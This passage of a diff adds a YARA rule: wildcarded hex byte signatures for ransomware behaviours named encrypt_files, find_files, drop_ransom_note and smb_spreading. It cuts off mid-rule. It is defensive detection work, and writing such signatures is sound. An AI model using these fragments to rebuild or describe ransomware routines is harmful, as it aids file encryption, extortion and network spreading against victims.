+            E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? EB ?? 0F 57
+            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? C6 45 ??
+            ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 83 78 ?? ?? 0F 85 ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 66 90 BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B FE 6A ?? 0F
+            42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A
+        }
+		$encrypt_files_v1_p4 = {
+            6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 46 ?? 50 FF B5 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 03 C6 89 85 ?? ??
+            ?? ?? 2B FE 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B CF C1 E1 ?? 2B CF 03 C9 83 F9 ?? 0F
+            82 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 E1 8B FA C1 EF ?? 0F 1F 00 BE ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 3B FE 6A ?? 0F 42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45
+            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            8D 46 ?? 50 FF B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            C0 ?? 03 C6 89 85 ?? ?? ?? ?? 2B FE 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ??
+            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? FF 37 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF 37 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68
+        }
+		$find_files_v2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
+            ?? 53 8B 5D ?? 56 57 53 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 4C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 89 74 24 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B
+            3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44
+            24 ?? 50 FF D7 85 C0 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 44 24 ?? 50 53 8D 84 24
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 44 24 ?? ?? 74 ?? BE ?? ??
+            ?? ?? 8D 44 24 ?? 50 FF 36 FF D7 85 C0 74 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? FF 74
+            24 ?? 8B 4C 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50
+            56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 ?? 8D 4C 24 ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 83 C0 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 FF 36 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C6 ??
+            81 FE ?? ?? ?? ?? 7C ?? 8B 74 24 ?? 8B CB E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? 50 E8 ?? ?? ??
+            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85
+        }
+		$encrypt_files_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 43 ?? 8B 73 ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D
+            8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50
+            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ??
+            ?? 74 ?? FF 15 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            33 F6 E9 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B
+            01 FF 50 ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D
+        }
+		$encrypt_files_v2_p2 = {
+            8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ??
+            ?? ?? EB ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F
+            11 85 ?? ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
+            ?? 6A ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 83 EC ?? 03 B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C9 83 C4 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            81 FE ?? ?? ?? ?? 73 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 EB
+            ?? 8D 0C B6 B8 ?? ?? ?? ?? C1 E1 ?? F7 E1 8D 45 ?? 50 8D 45 ?? C1 EA ?? 50 6A ?? 6A
+            ?? 6A ?? 6A ?? 8B C6 2B C2 6A ?? 50 57 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 45
+            ?? 83 C4 ?? 57 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45
+        }
+		$encrypt_files_v2_p3 = {
+            57 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84
+            05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57
+            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8
+            33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+            ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84
+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+        }
+		$encrypt_files_v2_p4 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 8B B5 ?? ?? ?? ?? 6A
+            ?? 50 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
+            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 57 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B
+            40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 50 ?? 8D 4A ?? 89 8C 15 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D 8B E3 5B C2
+        }
+		$drop_ransom_note_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 50 8D
+            45 ?? 64 A3 ?? ?? ?? ?? 8B F1 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B C6 66 83 3E ?? 74 ?? 0F 1F 80 ?? ?? ?? ?? 83 C0 ?? 66 83 38 ?? 75 ?? 50 56 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 3B C6 74 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 0F 10 06 0F 11 85 ?? ?? ?? ?? F3 0F 7E 46 ?? 66 0F D6 85 ?? ??
+            ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 8B 95 ?? ?? ?? ?? 83 FA
+        }
+		$drop_ransom_note_v2_p2 = {
+            72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 95 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D 85 ?? ?? ?? ??
+            C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B 10 8B C8 6A ??
+            FF 12 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
+        }
+		$drop_ransom_note_v2_p3 = {
+            0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ??
+            ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40
+            ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? EB
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0
+            39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
+            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05
+            ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72
+            ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$smb_spreading_v2_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ?? ?? ?? ?? 33 DB 89 9D ?? ?? ?? ?? 8D 42
+            ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 66 90 8D 72 ?? 03 F0 8B CE 8D 79 ?? 66 0F
+            1F 44 00 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ??
